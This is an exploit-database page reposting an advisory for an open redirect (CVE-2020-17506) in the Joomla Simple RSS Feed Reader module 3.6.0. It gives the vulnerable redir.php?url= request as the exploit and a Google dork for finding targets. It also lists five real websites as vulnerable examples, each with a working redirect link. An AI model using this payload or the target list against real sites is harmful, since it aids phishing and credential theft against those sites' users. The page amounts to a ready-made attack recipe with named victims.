Advertisement






Joomla Simple RSS Feed Reader mod_jw_srfr 3.6.0 Modules Open Redirect

CVE Category Price Severity
CVE-2020-17506 CWE-601 $500 Medium
Author Risk Exploitation Type Date
Unknown High Remote 2019-01-15
CPE
cpe:cpe:/a:joomla:simple_rss_feed_reader_mod_jw_srfr:3.6.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010157

Below is a copy:

Joomla Simple RSS Feed Reader mod_jw_srfr 3.6.0 Modules Open Redirect
###########################################################################

# Exploit Title : Joomla Simple RSS Feed Reader mod_jw_srfr 3.6.0 Modules Open Redirect
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : joomlaworks.net
# Software Download Links : 
joomlaworks.net/downloads/?f=mod_jw_srfr-v3.6.0_j2.5-3.x.zip
joomlaworks.net/downloads/?f=mod_jw_srfr-v3.6.0_j2.5-3.x.zip
# Software Information Links : 
+ extensions.joomla.org/extension/simple-rss-feed-reader/
+ joomlaworks.net/extensions/free/simple-rss-feed-reader
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 3.6.0
# Exploit Risk : Medium
# Google Dorks : inurl:"/modules/mod_jw_srfr/"
# Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')

###########################################################################

# Impact :
*********

* This web application called as Joomla Simple RSS Feed Reader mod_jw_srfr 3.6.0 

accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.

This simplifies phishing attacks.

* An http parameter may contain a URL value and could cause the web application to redirect 

the request to the specified URL. By modifying the URL value to a malicious site, an attacker may 

successfully launch a phishing scam and steal user credentials. Because the server name in the 

modified link is identical to the original site, phishing attempts have a more trustworthy appearance.

###########################################################################

# Exploit :
***********

/modules/mod_jw_srfr/redir.php?url=https://[OPEN-REDIRECT-ADDRESS-HERE.gov]

###########################################################################

# Example Vulnerable Sites :
*************************

[+] owyyk.com/modules/mod_jw_srfr/redir.php?url=http://cxsecurity.com/  =>

[ Proof of Concept for Open Redirect ] => archive.is/rWOQy

[+] rosemarytv.com/modules/mod_jw_srfr/redir.php?url=http://cxsecurity.com/

[+] lyngs.dk/modules/mod_jw_srfr/redir.php?url=http://cxsecurity.com/

[+] coachingathleticsq.com/modules/mod_jw_srfr/redir.php?url=http://cxsecurity.com/

[+] indonesianmma.com/modules/mod_jw_srfr/redir.php?url=http://cxsecurity.com/

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.